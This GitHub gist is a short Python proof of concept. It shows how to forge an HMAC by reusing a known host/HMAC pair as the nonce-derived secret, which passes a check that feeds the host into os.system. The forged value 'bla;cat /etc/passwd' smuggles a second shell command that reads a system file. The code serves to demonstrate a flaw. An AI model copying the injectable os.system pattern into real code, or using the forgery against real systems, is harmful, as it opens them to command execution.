Skip to content

Instantly share code, notes, and snippets.

@jamchamb
Created April 28, 2020 18:21
Show Gist options
  • Save jamchamb/bb3d3a2aca78e7dec71d664f22cc9cbd to your computer and use it in GitHub Desktop.
Save jamchamb/bb3d3a2aca78e7dec71d664f22cc9cbd to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import hmac
import os
SECRET = b'secret'
def test(host, in_hmac, nonce=None):
secret = SECRET
if nonce is not None:
secret = hmac.new(secret, msg=nonce, digestmod='sha256').hexdigest()
secret = secret.encode('ascii')
real_hmac = hmac.new(secret, msg=host, digestmod='sha256').hexdigest()
if real_hmac == in_hmac:
print('passed')
os.system(f'host {host.decode("ascii")}')
return True
else:
print('failed')
return False
# Known good HMAC/host pair
known_host = b'twitter.com'
known_hmac = hmac.new(SECRET, msg=known_host, digestmod='sha256').hexdigest()
print(f'known host/hmac: {known_host} - {known_hmac}')
test(known_host, known_hmac)
# Forged HMAC using known host/HMAC as nonce-secret
bad_msg = b'bla;cat /etc/passwd'
# use known HMAC as HMAC secret here
bad_hmac = hmac.new(known_hmac.encode('ascii'), msg=bad_msg, digestmod='sha256').hexdigest()
print(f'evil hmac {bad_hmac}')
# use known host as nonce here
test(bad_msg,
bad_hmac,
nonce=known_host)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment